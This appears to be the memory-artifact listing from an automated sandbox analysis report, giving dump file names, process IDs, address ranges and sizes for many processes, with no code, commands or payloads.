memory/1084-214-0x0000000001F10000-0x0000000002B5A000-memory.dmpFilesize
12.3MB
-
memory/1136-346-0x0000000004723000-0x0000000004724000-memory.dmpFilesize
4KB
-
memory/1136-349-0x0000000004724000-0x0000000004726000-memory.dmpFilesize
8KB
-
memory/1136-345-0x0000000004722000-0x0000000004723000-memory.dmpFilesize
4KB
-
memory/1136-344-0x0000000004721000-0x0000000004722000-memory.dmpFilesize
4KB
-
memory/1136-342-0x00000000002C0000-0x00000000002F0000-memory.dmpFilesize
192KB
-
memory/1136-343-0x0000000000400000-0x000000000045C000-memory.dmpFilesize
368KB
-
memory/1136-337-0x0000000000000000-mapping.dmp
-
memory/1176-109-0x0000000000000000-mapping.dmp
-
memory/1204-331-0x0000000000000000-mapping.dmp
-
memory/1208-182-0x0000000000000000-mapping.dmp
-
memory/1212-380-0x00000000015A0000-0x00000000015A2000-memory.dmpFilesize
8KB
-
memory/1320-126-0x0000000000000000-mapping.dmp
-
memory/1348-387-0x00000000004C0000-0x00000000004C2000-memory.dmpFilesize
8KB
-
memory/1372-360-0x0000000002A30000-0x0000000002A45000-memory.dmpFilesize
84KB
-
memory/1372-216-0x0000000003AC0000-0x0000000003AD5000-memory.dmpFilesize
84KB
-
memory/1400-194-0x0000000003510000-0x0000000005F18000-memory.dmpFilesize
42.0MB
-
memory/1400-166-0x0000000002EC0000-0x0000000002F3C000-memory.dmpFilesize
496KB
-
memory/1400-196-0x0000000000400000-0x0000000002E08000-memory.dmpFilesize
42.0MB
-
memory/1400-138-0x0000000000000000-mapping.dmp
-
memory/1448-203-0x0000000000000000-mapping.dmp
-
memory/1468-99-0x0000000000000000-mapping.dmp
-
memory/1568-101-0x0000000000000000-mapping.dmp
-
memory/1604-211-0x0000000000400000-0x0000000000414000-memory.dmpFilesize
80KB
-
memory/1604-205-0x0000000000000000-mapping.dmp
-
memory/1628-191-0x0000000000240000-0x0000000000249000-memory.dmpFilesize
36KB
-
memory/1628-140-0x0000000000000000-mapping.dmp
-
memory/1628-195-0x0000000000400000-0x0000000002D9C000-memory.dmpFilesize
41.6MB
-
memory/1628-164-0x0000000002F30000-0x0000000002F40000-memory.dmpFilesize
64KB
-
memory/1644-210-0x00000000003D0000-0x00000000003D1000-memory.dmpFilesize
4KB
-
memory/1644-197-0x0000000000930000-0x0000000000931000-memory.dmpFilesize
4KB
-
memory/1644-213-0x0000000000490000-0x0000000000492000-memory.dmpFilesize
8KB
-
memory/1644-156-0x0000000000000000-mapping.dmp
-
memory/1660-98-0x0000000000000000-mapping.dmp
-
memory/1668-217-0x0000000004A60000-0x0000000004A61000-memory.dmpFilesize
4KB
-
memory/1668-199-0x0000000000850000-0x0000000000851000-memory.dmpFilesize
4KB
-
memory/1668-135-0x0000000000000000-mapping.dmp
-
memory/1696-66-0x0000000000000000-mapping.dmp
-
memory/1696-94-0x0000000064940000-0x0000000064959000-memory.dmpFilesize
100KB
-
memory/1696-96-0x000000006B440000-0x000000006B4CF000-memory.dmpFilesize
572KB
-
memory/1696-84-0x000000006B440000-0x000000006B4CF000-memory.dmpFilesize
572KB
-
memory/1696-90-0x0000000064940000-0x0000000064959000-memory.dmpFilesize
100KB
-
memory/1696-95-0x0000000064940000-0x0000000064959000-memory.dmpFilesize
100KB
-
memory/1696-83-0x000000006B440000-0x000000006B4CF000-memory.dmpFilesize
572KB
-
memory/1696-85-0x000000006B440000-0x000000006B4CF000-memory.dmpFilesize
572KB
-
memory/1696-86-0x000000006FE40000-0x000000006FFC6000-memory.dmpFilesize
1.5MB
-
memory/1696-88-0x000000006FE40000-0x000000006FFC6000-memory.dmpFilesize
1.5MB
-
memory/1696-87-0x000000006FE40000-0x000000006FFC6000-memory.dmpFilesize
1.5MB
-
memory/1696-93-0x0000000064940000-0x0000000064959000-memory.dmpFilesize
100KB
-
memory/1696-97-0x000000006FE40000-0x000000006FFC6000-memory.dmpFilesize
1.5MB
-
memory/1696-89-0x000000006FE40000-0x000000006FFC6000-memory.dmpFilesize
1.5MB
-
memory/1696-91-0x000000006B280000-0x000000006B2A6000-memory.dmpFilesize
152KB
-
memory/1696-92-0x000000006B280000-0x000000006B2A6000-memory.dmpFilesize
152KB
-
memory/1728-184-0x0000000000000000-mapping.dmp
-
memory/1728-188-0x0000000000400000-0x0000000000414000-memory.dmpFilesize
80KB
-
memory/1768-192-0x0000000000000000-mapping.dmp
-
memory/1768-201-0x00000000003F0000-0x00000000003F1000-memory.dmpFilesize
4KB
-
memory/1772-129-0x0000000000000000-mapping.dmp
-
memory/1780-113-0x0000000000000000-mapping.dmp
-
memory/1820-175-0x0000000000000000-mapping.dmp
-
memory/1856-215-0x0000000003F20000-0x0000000004063000-memory.dmpFilesize
1.3MB
-
memory/1856-160-0x0000000000000000-mapping.dmp
-
memory/1916-107-0x0000000000000000-mapping.dmp
-
memory/1948-391-0x0000000001750000-0x0000000001752000-memory.dmpFilesize
8KB
-
memory/2028-353-0x0000000000000000-mapping.dmp
-
memory/2092-377-0x0000000000E50000-0x0000000000E52000-memory.dmpFilesize
8KB
-
memory/2112-388-0x0000000000160000-0x0000000000162000-memory.dmpFilesize
8KB
-
memory/2148-373-0x0000000001300000-0x0000000001302000-memory.dmpFilesize
8KB
-
memory/2156-381-0x00000000018E0000-0x00000000018E2000-memory.dmpFilesize
8KB
-
memory/2204-390-0x0000000000220000-0x0000000000222000-memory.dmpFilesize
8KB
-
memory/2216-269-0x0000000000000000-mapping.dmp
-
memory/2232-218-0x0000000000000000-mapping.dmp
-
memory/2232-284-0x00000000004A0000-0x00000000004A1000-memory.dmpFilesize
4KB
-
memory/2252-250-0x0000000004C50000-0x0000000004C51000-memory.dmpFilesize
4KB
-
memory/2252-240-0x0000000000390000-0x00000000003CE000-memory.dmpFilesize
248KB
-
memory/2252-220-0x0000000000000000-mapping.dmp
-
memory/2252-238-0x0000000000360000-0x0000000000361000-memory.dmpFilesize
4KB
-
memory/2252-225-0x00000000002C0000-0x00000000002C1000-memory.dmpFilesize
4KB
-
memory/2284-305-0x0000000000000000-mapping.dmp
-
memory/2296-374-0x00000000017B0000-0x00000000017B2000-memory.dmpFilesize
8KB
-
memory/2312-231-0x0000000000DE0000-0x0000000000DE1000-memory.dmpFilesize
4KB
-
memory/2312-239-0x0000000000520000-0x0000000000521000-memory.dmpFilesize
4KB
-
memory/2312-223-0x0000000000000000-mapping.dmp
-
memory/2312-241-0x0000000000530000-0x000000000053C000-memory.dmpFilesize
48KB
-
memory/2328-226-0x0000000000000000-mapping.dmp
-
memory/2336-270-0x0000000000000000-mapping.dmp
-
memory/2340-290-0x000000000041B23A-mapping.dmp
-
memory/2340-322-0x0000000004CD0000-0x0000000004CD1000-memory.dmpFilesize
4KB
-
memory/2352-327-0x0000000000B90000-0x0000000000B91000-memory.dmpFilesize
4KB
-
memory/2352-229-0x0000000000000000-mapping.dmp
-
memory/2352-233-0x0000000000950000-0x0000000000951000-memory.dmpFilesize
4KB
-
memory/2352-264-0x0000000004E60000-0x0000000004E61000-memory.dmpFilesize
4KB
-
memory/2352-296-0x0000000004E65000-0x0000000004E76000-memory.dmpFilesize
68KB
-
memory/2360-359-0x0000000000400000-0x0000000002D9C000-memory.dmpFilesize
41.6MB
-
memory/2372-332-0x0000000000000000-mapping.dmp
-
memory/2372-382-0x0000000001300000-0x0000000001302000-memory.dmpFilesize
8KB
-
memory/2372-336-0x00000000022E0000-0x0000000002F2A000-memory.dmpFilesize
12.3MB
-
memory/2372-335-0x00000000022E0000-0x0000000002F2A000-memory.dmpFilesize
12.3MB
-
memory/2376-299-0x0000000000000000-mapping.dmp
-
memory/2416-235-0x0000000000000000-mapping.dmp
-
memory/2436-236-0x0000000000000000-mapping.dmp
-
memory/2504-242-0x0000000000000000-mapping.dmp
-
memory/2536-297-0x0000000000000000-mapping.dmp
-
memory/2536-279-0x0000000000000000-mapping.dmp
-
memory/2572-375-0x0000000001860000-0x0000000001862000-memory.dmpFilesize
8KB
-
memory/2576-389-0x0000000001250000-0x0000000001252000-memory.dmpFilesize
8KB
-
memory/2580-245-0x0000000000000000-mapping.dmp
-
memory/2616-249-0x0000000000000000-mapping.dmp
-
memory/2624-323-0x0000000005610000-0x0000000005611000-memory.dmpFilesize
4KB
-
memory/2624-303-0x0000000000000000-mapping.dmp
-
memory/2628-251-0x0000000000000000-mapping.dmp
-
memory/2664-248-0x0000000000000000-mapping.dmp
-
memory/2688-253-0x0000000000000000-mapping.dmp
-
memory/2696-280-0x0000000000000000-mapping.dmp
-
memory/2712-301-0x0000000000000000-mapping.dmp
-
memory/2740-254-0x0000000000000000-mapping.dmp
-
memory/2740-271-0x0000000002420000-0x0000000002421000-memory.dmpFilesize
4KB
-
memory/2820-385-0x00000000012F0000-0x00000000012F2000-memory.dmpFilesize
8KB
-
memory/2824-376-0x00000000017E0000-0x00000000017E2000-memory.dmpFilesize
8KB
-
memory/2840-324-0x00000000055B0000-0x00000000055B1000-memory.dmpFilesize
4KB
-
memory/2840-258-0x0000000000000000-mapping.dmp
-
memory/2884-386-0x00000000017A0000-0x00000000017A2000-memory.dmpFilesize
8KB
-
memory/2892-307-0x0000000000000000-mapping.dmp
-
memory/2892-326-0x00000000022E0000-0x0000000002F2A000-memory.dmpFilesize
12.3MB
-
memory/2892-325-0x00000000022E0000-0x0000000002F2A000-memory.dmpFilesize
12.3MB
-
memory/2912-292-0x0000000000000000-mapping.dmp
-
memory/2948-320-0x0000000004C30000-0x0000000004C31000-memory.dmpFilesize
4KB
-
memory/2948-308-0x0000000000000000-mapping.dmp
-
memory/3056-283-0x0000000000280000-0x00000000002E0000-memory.dmpFilesize
384KB
-
memory/3056-265-0x0000000000000000-mapping.dmp